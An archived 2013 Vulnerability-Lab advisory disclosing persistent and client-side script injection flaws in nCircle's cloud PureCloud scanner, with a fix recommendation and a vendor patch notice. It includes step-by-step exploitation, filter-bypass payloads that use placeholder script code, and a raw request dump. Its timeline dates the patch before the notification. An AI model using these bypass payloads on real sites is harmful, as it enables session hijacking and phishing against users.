[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

nCircle PureCloud Vulnerability Scanner - Multiple Web Vulnerabilities

Title:
======
nCircle PureCloud Vulnerability Scanner - Multiple Web Vulnerabilities


Date:
=====
2013-01-28


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=795

nCircle Tracking ID: 20130117-US11337


VL-ID:
=====
795


Common Vulnerability Scoring System:
====================================
4.1


Introduction:
=============
nCircle PureCloud is brought to you by nCircle, the leading provider of 
information risk and security performance management solutions. 
PureCloud delivers an enterprise-class vulnerability scanner with more than 
double the coverage of other providers covering thousands of 
conditions and prioritized risk assessments – all in a cloud-based solution.

nCircle PureCloud is the world’s first security scanning technology that 
requires no scanning infrastructure on the customer network. 
PureCloud eliminates the need for firewall changes and software or hardware 
deployment on a customer`s internal network.. Requiring only 
a Web browser, PureCloud securely scans a private network to identify a broad 
range of vulnerabilities and risks, and provides detailed 
guidance on the steps necessary to reduce or eliminate those risks. With 
PureCloud, small businesses and home offices benefit from nCircle’s 
most advanced enterprise class security scanning solution, without the 
complexity or maintenance associated with traditional SaaS or on-premise 
scanning products. PureCloud is delivered as a software service in the Cloud, 
making it cost-effective, efficient and widely accessible.

(Copy of the Vendor Homepage: https://purecloud.ncircle.com/about_purecloud/ )


Abstract:
=========
The Vulnerability-Laboratory Research Team discovered a web vulnerability in 
the nCircle PureCloud (cloud-based) Vulnerability Scanner Application.


Report-Timeline:
================
2012-12-24:     Researcher Notification & Coordination
2012-12-25:     Vendor Notification
2012-01-16:     Vendor Response/Feedback
2012-01-28:     Vendor Fix/Patch by nCricle Dev
2012-01-28:     Public Disclosure


Status:
========
Published


Affected Products:
==================
nCircle
Product: PureCloud - Vulnerability Scanner (cloud-based) 2012 Q4


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
A persistent and client side POST Injection web vulnerability is detected in 
the in the nCircle PureCloud (cloud-based) Vulnerability Scanner Application.
The vulnerability typus allows an attacker to inject own malicious script code 
in the vulnerable module on application side (persistent).

1.1
The first vulnerability is located in the Scan Now > Scan Type > Perimeter Scan 
> Scan section when processing to request via the 
`Scan Specific Devices - [Add Devices]` module and the bound vulnerable 
formErrorContent exception-handling application parameters. 
The persistent injected script code will be executed out of the `invalid 
networks` web application exception-handling. To bypass 
the standard validation of the application filter the attacker need to provoke 
the specific invalid networks exception-handling error.
In the secound step the attacker splits the request of the invalid filter 
context to execute after it the not parsed malicious script code.
The vulnerability can be exploited on client side via force manipulated link as 
malicious request with medium user interaction but also 
via server side by a post injection in the later affected add server listing 
module.

1.2
The secound vulnerability is bound to the first issue and located in the IP & 
Name output listing of the scan index after processing to 
add a network/server/ip. The code will be executed out of the main ip & name 
listing after an evil inject via add module. To bypass the 
ip restriction filter it is required to split the request like in the first 
issue with a valid ip. The remote attacker includes a 
valid ip+split(%20)`+own_scriptcode to pass through the system validation 
filter and execute the script code out of the device name and ip listing. 


The vulnerability can be exploited with privileged application user account and 
low or medium required user interaction.
Successful exploitation of the vulnerability result in 
persistent/non-persistent session hijacking, persistent/non-persistent 
phishing, external redirect, external malware loads and 
persistent/non-persistent vulnerable module context manipulation.


Vulnerable Service(s):
                                [+] nCircle PureCloud (cloud-based) 
Vulnerability Scanner [https://purecloud.ncircle.com/index/]

Vulnerable Section(s):
                                [+] Scan Now > Scan Type > Perimeter Scan > Scan

Vulnerable Module(s):
                                [+] Scan Specific Devices - [Add Devices]
                                [+] Scan IP (Index)

Vulnerable Parameter(s):
                                [+] formErrorContent
                                [+] ip &- name

Affected Module(s):
                                [+] Exception Handling - Invalid Network(s)
                                [+] Scan Index - Listing


Proof of Concept:
=================
The client- & server-side web vulnerability can be exploited by remote 
attackers and local privileged application user accounts with 
low or medium user interaction. For demonstration or reproduce ...

1.1
Note:
When you try to inject a standard iframe, img src, script or onload the context 
will be parsed by the exception-handling to 
prevent the first execution after the inject attempt. To bypass the validation 
we first inject a frame which matches with the invalid 
exception filter to display the error. Now, we split the request with %20 and 
inject our code after the split via POST.

Manually Exploitation:
1. Register an account at nCircle PureCloud to get access to the (cloud-based) 
Vulnerability Scanner- 
[https://purecloud.ncircle.com/registerinfo3/?hacknewssocial]
2. Login to your account and switch to the scan now menu, open the scan type 
site
3. Choose the Perimeter Scan, not the local one!
4. Include a standard script alert tag to provoke the exception-handling, split 
the request with %20' and inject your own frame onload script code. Save via 
Add!
5. The scirpt code will be executed out of the exception-handling invalid 
networks message.
6. Done #1 ... Successful reproduced! Press Continue to exploit also the 
listing :)

7. Include a valid ip, split the request (bypass the input restriction) and 
inject after it your own script code.
8. Watch the scan index. The code will be executed out of the vulnerable name 
and ip value output listing.
9. Done #2 ... Successful reproduced!

PoC:
#1 <iframe src=PROVOKEINVALIDEXCEPTION1> %20' >"<[OWN INJECTED PERSISTENT 
SCRIPT CODE!]>
#2 <script>alert("PROVOKEINVALIDEXCEPTION2")</script> < %20' "><[OWN INJECTED 
PERSISTENT SCRIPT CODE!]) <


Review: Scan Specific Devices > [Add Devices] - Exception Handling - Invalid 
Network(s)

<div style="opacity: 0.87; position: absolute; top: 287px; left: 461px; 
margin-top: -200px;" 
class="id_add_hosts_textformError parentFormscan-form formError">
<div class="formErrorContent">
The following networks are invalid: 
%20"><"><script>alert(\"PROVOKEEXCEPTION\")> < %20' 
">"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!]> 
(host not found)</iframe></div><div class="formErrorArrow"><div 
class="line10"><!-- --></div><div class="line9"><!-- --></div>
<div class="line8"><!-- --></div><div class="line7"><!-- --></div><div 
class="line6"><!-- --></div><div class="line5"><!-- --></div>
<div class="line4"><!-- --></div><div class="line3"><!-- --></div><div 
class="line2"><!-- --></div><div class="line1"><!-- --></div></div></div>
<input value="%20"><iframe src=[PROVOKE!]>%20 >"<[PERSISTENT/NON-PERSISTENT 
INJECTED SCRIPT CODE!]>" 
id="id_add_hosts_text" tabindex="5" class="wizardInput" placeholder="Add 
Devices" type="text">
<button id="add_button" class="addButton">Add</button>
</div>


--- Manipulated POST Values ---
csrfmiddlewaretoken=HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N
json_data={"connector":-1,"scan_connected_network":false,
"registration_id":"","scope_name":"","editing_scope_schedule":false,
"webapp":false,"targets":["><script>alert(\"PROVOKEEXCEPTION\")> < %20' 
">"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!]) <"]}


--- Manipulated POST Request ---

Status: 200[OK]

POST https://purecloud.ncircle.com/services/validate_targets/ 
Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] Größe des Inhalts[181] Mime 
Type[application/json]
   
Request Header:
      Host[purecloud.ncircle.com]
      
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 
Firefox/17.0]
      
Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
      
Accept-Encoding[gzip, deflate]
      DNT[1]
      Connection[keep-alive]
      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
      
X-Requested-With[XMLHttpRequest]
      Referer[https://purecloud.ncircle.com/index/]
      Content-Length[439]
      
Cookie[csrftoken=HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N; 
sessionid=8c8624ba5e31c63bf24bcbf9af796743; 
BIGipServerPICO-443to80=1875711404.20480.0000; utmcct=/ben37.root; 
wcsid=uNTCNCc0tpp1NCv01YCYlGfr93631472; 
hblid=kRw3BvqhoczGhyJc8E8J5dYW93631472; 
_oklv=1356379996583%2CuNTCNCc0tpp1NCv01YCYlGfr93631472; 
olfsk=olfsk02835150931791619; 
_okbk=cd5%3Davailable%2Ccd4%3Dtrue%2Cwa1%3Dfalse%2Cvi5%3D0%2Cvi4%3D1356378355284%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8
%3Dchat%2Ccd6%3D0%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=9363-144-10-3734; 
__unam=97cb67-13bce735458-18f208d4-21; 
_mkto_trk=id:671-RXE-353&token:_mch-ncircle.com-1356378363952-41877]
      Pragma[no-cache]
      Cache-Control[no-cache]
   

POST-Daten:
csrfmiddlewaretoken[HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N]
      
json_data[%7B%22connector%22%3A-1%2C%22scan_connected_network%22%3Afalse%2C%22registration_id%22%3A%22%22%2C%22scope_name
%22%3A%22%22%2C%22editing_scope_schedule%22%3Afalse%2C%22webapp%22%3Afalse%2C%22targets%22%3A%5B%22%2520%5C%22+%2520+%5C%22%3E%3C
iframe+src%3Da+onload%3Dalert(%5C%22PROVOKEEXCEPtION%5C%22)+%3C++%5C%22%3E%3C[PERSISTENT/NON-PERSISTENT
 INJECTED SCRIPT CODE!])+%3C%22%5D%7D]
   

Response Header:
Date[Mon, 24 Dec 2012 20:13:25 GMT]
Server[Apache]
Content-Language[en]
Content-Encoding[gzip]
Vary[Accept-Language,Cookie,Accept-Encoding]
X-Frame-Options[SAMEORIGIN]
Content-Length[181]
Keep-Alive[timeout=15, max=76]
Connection[Keep-Alive]
Content-Type[application/json]


1.2
The server-side (persistent) web vulnerability can be exploited by remote 
attackers and local privileged application user accounts with 
low user interaction. For demonstration or reproduce ...

PoC:
[VALID IP]%20'+%20>"<><[PERSISTENT SCRIPT CODE!]+...
[VALID NAME]%20'+%20>"<><[PERSISTENT SCRIPT CODE!]+...


Solution:
=========
Parse the exception-handling error output listing and disallow error echos with 
requested web context.
To fix the vulnerability parse the context of the input fields in the add 
devices module. Restrict the the input fields with a secure filter mask. 
Parse also the name & ip scan index output listing and restrict the input of 
the requested web context scan listing.

2012-01-28:     Vendor Fix/Patch by nCricle Dev


Risk:
=====
1.1
The security risk of the client- and server-side post injection web 
vulnerability in the exception handling and listing is estimated as medium(+).

1.2
The security risk of the persistent input validation vulnerability in the scan 
index listing is estimated as medium(+).


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(bkm@xxxxxxxxxxxxxxxxxxxxx)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com              
               - www.vulnerability-lab.com/register
Contact:    admin@xxxxxxxxxxxxxxxxxxxxx         - support@xxxxxxxxxxxxxxxxxxxxx 
               - research@xxxxxxxxxxxxxxxxxxxxx
Section:    video.vulnerability-lab.com         - forum.vulnerability-lab.com   
               - news.vulnerability-lab.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab 
               - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@xxxxxxxxxxxxxxxxxxxxx or 
support@xxxxxxxxxxxxxxxxxxxxx) to get a permission.

                                        Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx